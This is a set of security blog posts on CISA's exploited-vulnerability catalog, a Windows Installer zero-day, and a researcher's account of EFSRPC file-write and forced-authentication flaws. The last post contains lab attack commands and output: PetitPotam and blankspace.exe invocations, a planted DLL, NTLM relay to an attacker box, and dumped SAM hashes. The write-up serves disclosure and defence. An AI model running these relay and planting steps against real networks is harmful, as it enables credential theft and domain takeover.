3, the Cybersecurity and Infrastructure Security Agency (CISA) added a whopping number of 95 new known exploited vulnerabilities to its Known Exploited Vulnerabilities Catalog.\n\nThis catalog provides Federal Civilian Executive Branch (FCEB) agencies with a list of vulnerabilities that are known to be exploited in the wild and gives the agencies a due date by when the vulnerability needs to be patched in their organization.\n\nBut even if your organization isn't a FCEB agency that needs to follow the [Binding Operational Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>), the CISA list can act as a good guide for your [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>) strategy.\n\n## 95 new ones?\n\nCISA normally sends out a mail every few days in which it details a few important vulnerabilities it's added to the Catalog. However, on March 3 it didn\u2019t even enumerate the list. Instead, it just emailed a [link to the Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and included instructions on how to find the most recently added vulnerabilities. If you're looking yourself, you need to click on the arrow of the "Date Added to Catalog" column, which will sort by descending dates.\n\n## Not so new\n\nThe first thing that jumped out at me is that these vulnerabilities were not all very new at all. The oldest vulnerability on that list is [CVE-**2002**-0367](<https://nvd.nist.gov/vuln/detail/CVE-2002-0367>), an almost 20 year old vulnerability in Windows NT and Windows 2000. In fact, only 5 vulnerabilities were patched in 2022. All these applied to Cisco\u2019s Small Business RV160, RV260, RV340, and RV345 series routers by the way.\n\nThis brings me to the next thing that is remarkable. 38 of the 95 added vulnerabilities are for [Cisco products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-cisco-fixes-several-vulnerabilities/>). 
Other products include those by Microsoft (27), Adobe (16), and Oracle(7).\n\nOf the Adobe vulnerabilities, nine were found in Flash Player. Adobe Flash Player reached End of Life (EOL) on December 31, 2020, after being first announced in 2017. Since Adobe no longer supports Flash Player, on January 12, 2021, the company started blocking Flash content from running. In fact, [Adobe strongly recommends](<https://www.adobe.com/nl/products/flashplayer/end-of-life.html>) all users immediately uninstall Flash Player to help protect their systems.\n\n## Possible reasons\n\nPondering the reason for CISA to suddenly add 95 vulnerabilities to their list, I came up with the following options:\n\n * It suddenly became aware of several old vulnerabilities that were nonetheless still being exploited.\n * It suddenly decided to list vulnerabilities in software that has long reached EOL but could still be used a lot.\n * The nature of actively exploited vulnerabilities has changed.\n\n## Some examples\n\nPersonally, I suspect that the nature of the actively exploited vulnerabilities has changed. Last year, you would typically see exploited vulnerabilities that would allow an attacker to breach a network or compromise a system to gain a foothold. This allows attackers to exfiltrate data, plant ransomware, and other criminal activities that could lead to financial gain.\n\nHowever, looking at some of the vulnerabilities that were included in this list of 95, I noticed that many could lead to Denial-of-Service (DoS) attacks.\n\nExamples:\n\n * A [vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2016-8562>) in Siemens SIMATIC CP 1543-1 versions before 2.0.28 allows remotely authenticated users to cause a denial of service by modifying SNMP variables.\n * Multiple Cisco vulnerabilities on this list which could result in a DoS condition or cause an affected system to reload.\n\nOther vulnerabilities could allow attackers to run arbitrary code or cause a denial of service. 
For example, a [PowerPoint](<https://nvd.nist.gov/vuln/detail/CVE-2015-2424>) vulnerability that has been around since 2015 and was found to be used by the Russian state-sponsored team APT28 (aka Fancy Bear) in 2018.\n\nSome [Flash Player vulnerabilities](<https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html>) were found to be used in targeted attacks. The suspect in this case was APT37, also known as the North Korean \u201cLazarus\u201d group.\n\nA vulnerability in older Windows versions (Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1) would allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document. The use of this exploit was [attributed](<https://www.trendmicro.com/en_us/research/14/j/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm.html>) to the Russian \u201cSANDWORM\u201d operation.\n\nI also found an Elevation of Privilege (EoP) [vulnerability in a Windows Installer](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379>) on the CISA list that would allow an attacker to delete targeted files on a system. However, they would NOT gain privileges to view or modify file contents.\n\nOther interesting items on the list are some [IoT](<https://blog.malwarebytes.com/glossary/iot/>) vulnerabilities that got some fame in 2020 under the name [Ripple20](<https://www.jsof-tech.com/disclosures/ripple20/>). Successful exploitation of these vulnerabilities could result in denial of service, information disclosure or remote code execution.\n\nSo, is it just me or is there a trend here that shows vulnerabilities that were previously hard to exploit for financial gain, but are perfectly usable to disrupt operations? 
Could it be that, no surprise, the war in Ukraine has changed the nature of the actively exploited vulnerabilities?

According to Adam Kujawa, Security Evangelist and Director of Malwarebytes' Threat Intel team:

> "In 2007, we observed Russian sympathizers online utilizing hacking tools to launch disruption attacks against Georgian news networks and government networks, to prevent information from flowing to the public while Russia had troops roll in. Similar events have happened in Estonia, and Russian sponsored hackers are known to utilize Ukrainian networks as a kind of “playground” for their attacks, shutting off power grids and other critical infrastructure, launching massive supply chain attacks against them (as in the case of NotPetya). And those are just some of the attacks we know about.

> With that in mind, I believe that while many of these vulnerabilities are useless against actual intrusion and espionage, the exploits developed from them will be used to disrupt and degrade rather than collect.

> I am not sure how many of these have been used in the wild, and while it is great to see CISA be proactive in spreading this information, I must wonder how much of the information will get to those protecting networks in Ukraine? Could it be that CISA may have just handed over the knowledge about various disruptive exploits that will work on unpatched systems, to be used against those who don’t have endpoint patching as their top priority?"

## Mitigation

Given the varied nature of the list, the most actionable advice is to keep an eye on the known exploited vulnerabilities catalog. To make things easier, you can [subscribe](<https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_136>) to receive the updates.
Besides the [usual security advice](<https://blog.malwarebytes.com/awareness/2022/03/four-smb-cybersecurity-practices-during-geopolitical-upheaval/>), now seems to be a good time to invest in clever [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>), and ditch that software which has reached EOL and no longer receives security updates.

Stay safe, everyone!

The post [CISA list of 95 new known exploited vulnerabilities raises questions](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).
# Ongoing Exploitation of Windows Installer CVE-2021-41379

CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update
---|---|---|---|---|---
CVE-2021-41379 | [Microsoft Advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) | [AttackerKB](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=blog>) | Scheduled (when patched) | ASAP (when released) | December 3, 2021 3:00 PM ET

_See the Updates section at the end of this post for new information._

## Description

On November 9, 2021, as part of Patch Tuesday, Microsoft released an update to address [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), a “Windows Installer Elevation of Privilege Vulnerability” that had a modest CVSS score (5.5), without much fanfare. The original CVE allows an attacker to delete files on a system using elevated privileges.

Fast-forward to November 22, 2021, when, after investigating the patch, the researcher who discovered the vulnerability, Abdelhamid Naceri, found that it did not fully remediate the issue and published proof-of-concept (PoC) code on [GitHub](<https://github.com/klinix5/InstallerFileTakeOver>) proving that exploitation of the vulnerability is still possible on patched versions of Windows, allowing for SYSTEM-level privileges.
The working PoC “overwrites Microsoft Edge elevation service 'DACL' and copies itself to the service location, then executes it to gain elevated privileges.”

With a zero-day exploit available, attackers have been chipping away at ways to utilize the vulnerability, especially in [malware](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>).

As of November 30, 2021, there is not an official patch from Microsoft to fully and effectively remediate this vulnerability. Community researchers and security practitioners have noted that other Microsoft zero-day vulnerabilities this year, such as [CVE-2021-36934](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>) (“HiveNightmare”/“SeriousSAM”), were not fixed until typical Patch Tuesday release cycles even if public exploit code had already made an appearance. We expect that this vulnerability will follow that same pattern and that we won’t see a new patch (and/or a new CVE, if Microsoft does indeed classify this as a patch bypass) until December 2021’s Patch Tuesday.

## Affected versions

According to the researcher, all supported versions of Windows, including Windows 11 and Server 2022, are vulnerable to the exploit.

## Guidance

With no official patch at this time, we recommend that organizations prepare to patch this as soon as the official fix is released. Meanwhile, Rapid7 researchers have confirmed that [a number of antimalware programs](<https://www.virustotal.com/gui/file/a43bafb2af2a1adcd1371ab3810b2908b591bc32798f3ad35ad662cf967b12fd/detection>) have added detection of Naceri's exploit, so as usual, keep those programs up to date.
Lastly, organizations can detect previous exploitation of this PoC by monitoring for EventID 1033 and “test pkg” (keeping in mind that “test pkg” will only find this exact PoC and may be modified by more enterprising attackers).

**(Please see the Updates section regarding the latest on AV detection of this exploit).**

## Rapid7 customers

For Rapid7 InsightVM customers, we will be releasing vulnerability checks if and when Microsoft publishes patch information for the new vulnerability.

In the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find Windows assets by creating the following query: `os.family` `contains` `windows`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `OS` `contains` `windows`.

## Updates

[December 3, 2021]
Rapid7 has published an in-depth technical analysis on [AttackerKB](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=blog>) that includes a streamlined, more functional PoC.
Also of note, our research shows that attackers using this exploit can easily evade detection by AV.

---

On December 14, 2021, during the [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>) chaos, Microsoft published [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>), a remote privilege escalation vulnerability affecting the Windows Encrypted File System (EFS).
The vulnerability was credited to [James Forshaw](<https://twitter.com/tiraniddo>) of [Google Project Zero](<https://googleprojectzero.blogspot.com/p/about-project-zero.html>), but perhaps owing to the Log4Shell atmosphere, the vulnerability gained little to no attention.

On January 13, 2022, Forshaw [tweeted](<https://twitter.com/tiraniddo/status/1481633916507209737?s=20&t=P1xWmHiiDap39HipKqbHGg>) about the vulnerability.

The tweet suggests that CVE-2021-43893 was only issued a partial fix in the December 2021 update and that authenticated and remote users could still write arbitrary files on domain controllers. James linked to the Project Zero [bug tracker](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2228>), where an extended writeup and some proof-of-concept code were stored.

This vulnerability was of particular interest to me, because I had recently discovered a local privilege escalation (LPE) using file planting in a Windows product. The vulnerable product could reasonably be deployed on a system with unconstrained delegation, which meant I could use CVE-2021-43893 to remotely plant the file as a low-privileged _remote_ user, turning my LPE into RCE.

I set out to investigate if the remote file-writing aspect of James Forshaw’s bug was truly unpatched. The investigation resulted in a few interesting observations:

 * Low-privileged user remote file-writing was patched in the December update. However, before the December update, a remote low-privileged user really could write arbitrary files on systems assigned unconstrained delegation.
 * Forced authentication and relaying are still not completely patched. Relay attacks initiated on the `efsrpc` named pipe have been known since their inclusion in [PetitPotam](<https://github.com/topotam/PetitPotam>) in [July 2021](<https://github.com/topotam/PetitPotam/commit/d3a3e0ccbe22432a30509df3551a7766bb89f706>).
The issue seems to persist despite multiple patch attempts.

Although the file upload aspect of this vulnerability has been patched, I found the vulnerability quite interesting. The vulnerability is certainly limited by the restrictions on where a low-privileged user can create files on a Domain Controller, and maybe that is why the vulnerability didn’t receive more attention. But as I touched upon, it can be paired with a local vulnerability to achieve remote code execution, and as such, I thought it deserved more attention. I have also found the failure to properly patch forced authentication over the [EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) protocol to be worthy of more examination.

## Inadequate EFSRPC forced authentication patching: A brief history of PetitPotam

PetitPotam was released in the summer of 2021 and was widely associated with an [attack chain](<https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory>) that starts as an unauthenticated and remote attacker and ends with domain administrator privileges. PetitPotam is **only** the beginning of that chain. It allows an attacker to force a victim Windows computer to authenticate to a third party (e.g. [MITRE ATT&CK T1187 - forced authentication](<https://attack.mitre.org/techniques/T1187/>)). The full chain is interesting, but this discussion is only interested in the initial portion triggered by PetitPotam.

PetitPotam triggers forced authentication using the EFSRPC protocol. The original implementation of the exploit performed the attack over the `lsarpc` named pipe. The attack is quite simple.
Originally, PetitPotam sent the victim server an [`EfsRpcOpenFileRaw`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/ccc4fb75-1c86-41d7-bbc4-b278ec13bfb8>) request containing a [UNC file path](<https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats>). Using a UNC path such as `\\10.0.0.4\fake_share\fake_file` forces the victim server to reach out to the third-party server, 10.0.0.4 in this example, in order to read from the desired file share. The third-party server can then tell the victim to authenticate in order to access the share, and the victim obliges. The result is that the victim leaks its Net-NTLM hash. That’s the whole thing. We will later touch on what an attacker can do with this hash, but for this section, that’s all we need to know.

Microsoft first attempted to patch the EFSRPC forced authentication in August 2021 by blocking the use of `EfsRpcOpenFileRaw` over the `lsarpc` named pipe. To do this, they added logic to `efslsaext.dll`’s `EfsRpcOpenFileRaw_Downlevel` function to check for a value stored in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EFS\AllowOpenRawDL`. Because this registry value doesn’t exist by default, a typical configuration will always fail this check.

That patch was inadequate, because `EfsRpcOpenFileRaw` isn’t the only EFSRPC function that accepts a UNC file path as a parameter. PetitPotam was quickly [updated](<https://github.com/topotam/PetitPotam/commit/ea66c3f141b1ce3f97865518c87a9b53ebecdb7a>) to use `EfsRpcEncryptFileSrv`, and just like that, the patch was bypassed.

The patch also failed to recognize that the `lsarpc` named pipe wasn’t the only named pipe that EFSRPC can be executed over. The [`efsrpc`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/403c7ae0-1a3a-4e96-8efc-54e79a2cc451>) named pipe (among others) can also be used.
The `efsrpc` named pipe is slightly less desirable, since it requires the attacker to be authenticated, but the attack works over that pipe, **and** it doesn’t use the `EfsRpcOpenFileRaw_Downlevel` function. That means an attacker can also bypass the patch by switching named pipes.

As mentioned earlier, PetitPotam was updated in July 2021 to use the `efsrpc` named pipe. The following output shows PetitPotam forcing a Domain Controller patched through November 2021 to authenticate with an attacker-controlled box running Responder.py (10.0.0.6) (I’ve left out the Responder bit since this is just meant to highlight that EFSRPC was available and unpatched for months).

    albinolobster@ubuntu:~/impacket/examples$ python3 petitpotam.py -pipe efsr -u 'lowlevel' -p 'cheesed00dle!' -d okhuman.ninja 10.0.0.6 10.0.0.5

    PoC to elicit machine account authentication via some MS-EFSRPC functions
    by topotam (@topotam77)

    Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

    [-] Connecting to ncacn_np:10.0.0.5[\PIPE\efsrpc]
    [+] Connected!
    [+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d
    [+] Successfully bound!
    [-] Sending EfsRpcOpenFileRaw!
    [+] Got expected ERROR_BAD_NETPATH exception!!
    [+] Attack worked!

Not only did Microsoft fail to patch the issue, but they didn’t issue follow-up patches for months.
They also haven’t updated their advisory to indicate that the vulnerability has been exploited in the wild, despite its inclusion in CISA’s [Known Exploited Vulnerability Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).

In December 2021, Microsoft released a patch for a different EFSRPC vulnerability: [CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>). As part of the remediation for that issue, [Microsoft implemented](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>) some hardening measures on EFSRPC communication. In particular, EFSRPC clients would need to use [`RPC_C_AUTHN_LEVEL_PKT_PRIVACY`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/425a7c53-c33a-4868-8e5b-2a850d40dc73>) when using EFSRPC. If the client fails to do so, then the client is rejected and a Windows application event is generated.

At the time of the December patch, PetitPotam didn’t use this specific setting. However, a quick [update](<https://github.com/topotam/PetitPotam/commit/c3accf0875729ffabac13692841e0a671f96d0f2>) allowed the exploit to comply with the new requirement and get back to leaking machine account NTLM hashes of fully patched Windows machines.

## CVE-2021-43893: Windows EFS remote file upload

James Forshaw’s CVE-2021-43893 dives deeper into the EFSRPC functionality, but the heart of the issue is still a UNC file path problem. PetitPotam’s UNC path pointed to an external server, but CVE-2021-43893 points internally using the UNC path `\\.\C:\`. Using a UNC path that points to the victim’s local file system allows attackers to create files and directories on the victim file system.

There are two major caveats to this vulnerability. First, the file-writing aspect of this vulnerability only appears to work on systems with unconstrained delegation.
That’s fine if you are only interested in Domain Controllers, but less good if you are only interested in workstations.

Second, the victim server is impersonating the attacker when the file manipulation occurs. This means a low-privileged attacker can only write to the places where they have permission (e.g. `C:\ProgramData\`). Therefore, exploitation resulting in code execution is not a given. Still, while code execution isn’t guaranteed, there are many plausible scenarios that could lead there.

### A plausible scenario leading to RCE using CVE-2021-43893

My interest in this vulnerability started with a local privilege escalation that I wanted to convert into remote code execution as a higher-privileged user. We can’t yet share the LPE as it’s still unpatched, but we can create a plausible scenario that demonstrates the ability to achieve code execution.

Microsoft has long maintained that Microsoft services vulnerable to [DLL planting](<https://itm4n.github.io/windows-dll-hijacking-clarified/>) via a world-writable `%PATH%` directory are **[won’t-fix](<https://msrc-blog.microsoft.com/2018/04/04/triaging-a-dll-planting-vulnerability/>)** low-security issues — a weird position given the effort it would take to fix such issues.
But regardless, exploiting a world-writable `%PATH%` directory to escalate privileges via a Windows service ([MITRE ATT&CK - Hijack Execution Flow: DLL Search Order Hijacking](<https://attack.mitre.org/techniques/T1574/001/>)) is a useful technique when it’s [available](<https://github.com/rapid7/metasploit-framework/blob/1499b1988e0f6c6cb541e715cf7a3dc43d5563f3/modules/exploits/windows/local/srclient_dll_hijacking.rb>).

There’s a well-known product that installs itself into a world-writable directory: [Python 2.7](<https://www.python.org/downloads/release/python-2718/>), all the way through its final release 2.7.18.

    C:\Users\administrator>icacls.exe C:\Python27\
    C:\Python27\ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                 BUILTIN\Administrators:(I)(OI)(CI)(F)
                 BUILTIN\Users:(I)(OI)(CI)(RX)
                 BUILTIN\Users:(I)(CI)(AD)
                 BUILTIN\Users:(I)(CI)(WD)
                 CREATOR OWNER:(I)(OI)(CI)(IO)(F)

    Successfully processed 1 files; Failed processing 0 files

The Python 2.7 installer drops files into `C:\Python27\` and provides the user with the following instructions:

    Besides using the automatically created start menu entry for the Python interpreter, you might want to start Python in the DOS prompt. To make this work, you need to set your %PATH% environment variable to include the directory of your Python distribution, delimited by a semicolon from other entries. An example variable could look like this (assuming the first two entries are Windows’ default):

    C:\WINDOWS\system32;C:\WINDOWS;C:\Python25

    Typing python on your command prompt will now fire up the Python interpreter. Thus, you can also execute your scripts with command line options, see Command line documentation.

Following these instructions, we now have a world-writable directory in `%PATH%` — which is, of course, the exploitable condition we were looking for. Now we just have to find a Windows service that will search for a missing DLL in `C:\Python27\`.
I quickly accomplished this task by restarting all the running services on a test Windows Server 2019 and watching [procmon](<https://docs.microsoft.com/en-us/sysinternals/downloads/procmon>). I found a number of services will search `C:\Python27\` for:

 * fveapi.dll
 * cdpsgshims.dll

To exploit this, we just need to drop a “malicious” DLL named `fveapi.dll` or `cdpsgshims.dll` in `C:\Python27`. The DLL will be loaded when a vulnerable service restarts or the server reboots.

For this simple example, the “malicious” DLL just creates the file `C:\r7.txt`:

    #include <Windows.h>

    HANDLE hThread;
    DWORD dwThread;

    // Worker thread: create the marker file to prove the DLL ran
    DWORD WINAPI doCreateFile(LPVOID)
    {
        HANDLE createFile = CreateFileW(L"C:\\r7.txt", GENERIC_WRITE, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
        CloseHandle(createFile);
        return 0;
    }

    BOOL APIENTRY DllMain( HMODULE, DWORD ul_reason_for_call, LPVOID)
    {
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
            // Do the work off the loader thread, as DllMain should not block
            hThread = CreateThread(NULL, 0, doCreateFile, NULL, 0, &dwThread);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }

After compiling the DLL, an attacker can remotely drop the file into `C:\Python27` using CVE-2021-43893. The following is the output from our [refactored and updated version](<https://github.com/jbaines-r7/blankspace>) of Forshaw’s original proof of concept.
The attacker is attempting to remotely write the DLL on 10.0.0.6 (vulnerable.okhuman.ninja):

    C:\ProgramData>whoami
    okhuman\lowlevel

    C:\ProgramData>.\blankspace.exe -r vulnerable.okhuman.ninja -f \\.\C:\Python27\fveapi.dll -i ./dll_inject64.dll
    [+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja
    [+] Attempting to write to \\.\C:\Python27\fveapi.dll
    [+] Encrypt the empty remote file...
    [+] Reading the encrypted remote file object
    [+] Read back 1244 bytes
    [+] Writing 92160 bytes of attacker data to encrypted object::$DATA stream
    [+] Decrypt the the remote file
    [!] Success!

    C:\ProgramData>

The attack yields the desired output, and the file is written to `C:\Python27\` on the remote target.

Below is the Procmon output demonstrating successful code execution as `NT AUTHORITY\SYSTEM` when the “DFS Replication” service is restarted. Note that the malicious DLL is loaded and the file `C:\r7.txt` is created.

Do many administrators install Python 2.7 on their Domain Controller? I hope not. That wasn’t really the point.
The point is that exploitation using this technique is plausible and worthy of our collective attention to ensure that it gets patched and monitored for exploitation.

### What can a higher-privileged user do?

Oddly, administrators can do anything a low-level user can do except write data to files. When the administrator attempts to write to a file using Forshaw’s `::$DATA` stream technique, the result is an ACCESS DENIED error. Candidly, I didn’t investigate why.

However, it is interesting to note that the administrative user can remotely overwrite all files. This doesn’t serve much purpose from an offensive standpoint, but would serve as an easy, low-effort [wiper](<https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/033/904/original/Talos_WiperWhitepaper.v3.pdf?1525893980>) or data destruction attack. Here is a silly example of remotely overwriting calc.exe from an administrator account.

    C:\ProgramData>whoami
    okhuman\test_admin

    C:\ProgramData>.\blankspace.exe -r vulnerable.okhuman.ninja -f \\.\C:\Windows\System32\calc.exe -s "aaaaaaaaaaaa"
    [+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja
    [+] Attempting to write to \\.\C:\Windows\System32\calc.exe
    [+] Encrypt the empty remote file...
    [-] EfsRpcEncryptFileSrv failed with status code: 5

    C:\ProgramData>

As you can see from the output, the tool
failed with status code 5 (Access Denied). However, `calc.exe` on the remote device was successfully overwritten.

Technically speaking, this doesn’t really represent a security boundary being crossed. Administrators typically have access to `\\host\C$` or `\\host\admin$`, but the difference in behavior seemed worth mentioning. I’d also note that as of February 2022, administrative users can still do this using `\\localhost\C$\Windows\System32\calc.exe`.

Forshaw also mentioned in his original writeup, and I confirmed, that this attack generates the attacking user’s roaming profile on the victim server. That could be a pretty interesting file-upload vector if the Active Directory environment synchronizes roaming directories. Again, I didn’t investigate that any further, but it could be useful in the correct environment.

### Forced authentication still not entirely patched

The December 2021 patch brought multiple changes to `efslsaext.dll` and resulted in partial mitigation of [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>). One of the changes was the introduction of two new functions: `EfsEnsureLocalPath` and `EfsEnsureLocalHandle`. `EfsEnsureLocalPath` grabs a HANDLE for the attacker-provided file using [`CreateFileW`](<https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew>).
The HANDLE is then passed to `EfsEnsureLocalHandle`, which passes the HANDLE to `NtQueryVolumeInformationFile` to validate that the characteristics flag doesn’t contain [FILE_REMOTE_DEVICE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/616b66d5-b335-4e1c-8f87-b4a55e8d3e4a>).

Because the patch **still** opens a HANDLE using the attacker-controlled file path, EFSRPC _remains_ vulnerable to forced authentication and relay attacks of the machine account.

Demonstration of the forced authentication and relay does not require the complicated attack often associated with PetitPotam. We just need three boxes:

 * The Relay (10.0.0.3): A Linux system running `ntlmrelayx.py`.
 * The Attacker (10.0.0.6): A fully patched Windows 10 system.
 * The Victim (10.0.0.12): A fully patched Windows Server 2019 system.

The only caveat for this example is that the victim’s machine account (aka [computer account](<https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/service-accounts-computer>)) is assigned to the `Domain Admins` group. Below, you can see the machine account for 10.0.0.12, YEET$, is a member of `Domain Admins`.

This may not be a common configuration, but it’s common enough that it’s been the subject of a [couple](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts>) [excellent](<https://pentestlab.blog/2022/02/01/machine-accounts/>) writeups.

The attack is launched by a low-privileged user on 10.0.0.6 using the `blankspace.exe` proof of concept.
The attack will force 10.0.0.12 (yeet.okhuman.ninja) to authenticate to the attacker relay at 10.0.0.3.

    C:\ProgramData>blankspace.exe -r yeet.okhuman.ninja -f \\10.0.0.3\r7\r7 --relay
    [+] Creating EFS RPC binding handle to yeet.okhuman.ninja
    [+] Sending EfsRpcDecryptFileSrv for \\10.0.0.3\r7\r7
    [-] EfsRpcDecryptFileSrv failed with status code: 53
    [+] Network path not found error received!
    [!] Success!

    C:\ProgramData>

The Linux relay is running [ntlmrelayx.py](<https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/>) and configured to relay the YEET$ authentication to 10.0.0.6 (the original attacker box). Below, you can see `ntlmrelayx.py` capture the authentication and send it on to 10.0.0.6.

    albinolobster@ubuntu:~/impacket/examples$ sudo python3 ntlmrelayx.py -debug -t 10.0.0.6 -smb2support
    Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

    [*] SMBD-Thread-4: Connection from OKHUMAN/YEET$@10.0.0.12 controlled, attacking target smb://10.0.0.6
    [*] Authenticating against smb://10.0.0.6 as OKHUMAN/YEET$ SUCCEED

The relay is now authenticated to 10.0.0.6 as `YEET$`, a domain administrator. It can do pretty much as it pleases.
Below, you can see it dumps the local SAM database.\n \n \n [*] Target system bootKey: 0x9f868ddb4e1dfc56d992aa76ff931df4\n [+] Saving remote SAM database\n [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\n [+] Calculating HashedBootKey from SAM\n [+] NewStyle hashes is: True\n Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6aa01bb4a68e7fd8650cdeb6ad2b63ec:::\n [+] NewStyle hashes is: True\n albinolobster:1000:aad3b435b51404eeaad3b435b51404ee:430ef7587d6ac4410ac8b78dd5cc2bbe:::\n [*] Done dumping SAM hashes for host: 10.0.0.6\n \n\nIt\u2019s as easy as that. All you have to do is find a host with a machine account in the domain admins group:\n \n \n C:\\ProgramData>net group \"domain admins\" /domain\n The request will be processed at a domain controller for domain okhuman.ninja.\n \n Group name Domain Admins\n Comment Designated administrators of the domain\n \n Members\n \n -------------------------------------------------------------------------------\n Administrator test_domain_admin YEET$\n The command completed successfully.\n \n \n C:\\ProgramData>\n \n\nOnce you have that, a low-privileged remote attacker can use EFSRPC to relay and escalate to other machines. However, the attack isn\u2019t exactly silent. On 10.0.0.6, event ID 4624 was created when the 10.0.0.3 relay logged in using the YEET$ machine account.\n\n\n\n## Final thoughts and remediation\n\nWhat began as an investigation into using an unpatched remote file-write vulnerability ended up being a history lesson in EFSRPC patches. 
The remote file-write vulnerability that I originally wanted to use has been patched, but we demonstrated that the forced authentication issue hasn\u2019t been adequately fixed. There is no doubt that Windows developers have a tough job. However, a lot of the issues discussed here could have been easily avoided with a reasonable patch in August 2021. The fact that they persist today says a lot about the current state of Windows security.\n\nTo mitigate these issues as best as possible, as always, ensure your systems are successfully updated monthly. Microsoft has released multiple advisories with recommendations regarding NTLM relay-based attacks (see [Microsoft Security Advisory 974926](<https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2009/974926>) and [KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>)). The most important advice is to ensure SMBv1 no longer exists in your environment and to require SMB signing.\n\nSome other general advice:\n\n * Monitoring for [event ID 4420](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>) in Windows application event logs can help detect EFSRPC-based hacking tools.\n * Monitor for [event ID 4624](<https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624>) in Windows security event logs for remote machine account authentication.\n * Audit machine accounts to ensure they are not members of Domain Admins. 
